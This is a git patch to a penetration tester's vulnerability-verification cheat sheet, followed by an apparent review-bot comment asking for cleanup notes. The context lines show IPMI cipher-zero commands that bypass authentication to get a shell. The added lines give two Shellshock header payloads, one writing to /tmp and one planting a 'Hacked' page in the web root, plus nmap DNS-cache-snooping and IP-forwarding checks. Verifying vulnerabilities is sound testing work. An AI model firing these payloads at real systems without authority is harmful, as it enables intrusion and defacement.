From e36468409d32e349d5bd05335610913419a31955 Mon Sep 17 00:00:00 2001
From: JShaw
Date: Thu, 9 Oct 2014 16:27:10 +0100
Subject: [PATCH] Updates Updates
---
 Cheatsheet_VulnVerify.txt | 31 ++++++++++++++++++++++++++++++-
 1 file changed, 30 insertions(+), 1 deletion(-)
diff --git a/Cheatsheet_VulnVerify.txt b/Cheatsheet_VulnVerify.txt
index dd83311..fc8c922 100644
--- a/Cheatsheet_VulnVerify.txt
+++ b/Cheatsheet_VulnVerify.txt
@@ -1,4 +1,4 @@
-Verify various vulnerabilities
+Verify Various Vulnerabilities
 ------------------------------
 [+] IPMI Cipher Suite Zero Authentication Bypass:
@@ -16,3 +16,32 @@ ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis
 ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
 ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
 ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor
+
+
+[+] Bash Remote Code Execution (Shellshock)
+http://www.tenable.com/plugins/index.php?view=single&id=77823
+
+x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
+x: () { :;}; echo "Hacked" > /var/www/hacked.html
+
+
+[+] DNS Server Cache Snooping Remote Information Disclosure
+http://www.tenable.com/plugins/index.php?view=single&id=12217
+
+Nmap Script: dns-cache-snoop
+http://nmap.org/nsedoc/scripts/dns-cache-snoop.html
+
+nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}'
+
+
+[+] IP Forwarding Enabled
+http://www.tenable.com/plugins/index.php?view=single&id=50686
+
+Nmap Script: ip-forwarding
+http://nmap.org/nsedoc/scripts/ip-forwarding.html
+
+sudo nmap -sn --script ip-forwarding --script-args='target=www.example.com'
+
+Alternatives:
+- Set VM's default gateway as the victim IP address and attempt to route elsewhere.
+- http://pentestmonkey.net/tools/gateway-finder
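Review bot: The two check strings added under `[+] Bash Remote Code Execution (Shellshock)` both write to the tested host (`/tmp/ifconfig.txt` and `/var/www/hacked.html`) and the entry records no cleanup, so a verification run leaves files behind, one of them in the web root. I would add a line under the entry such as `Cleanup: remove /tmp/ifconfig.txt and /var/www/hacked.html after verification and list them in the report`. Separately, the two nmap lines in the same hunk name no host to scan as shown; if the `<target>` placeholder used on the linked NSE pages was intended, it should appear in the command.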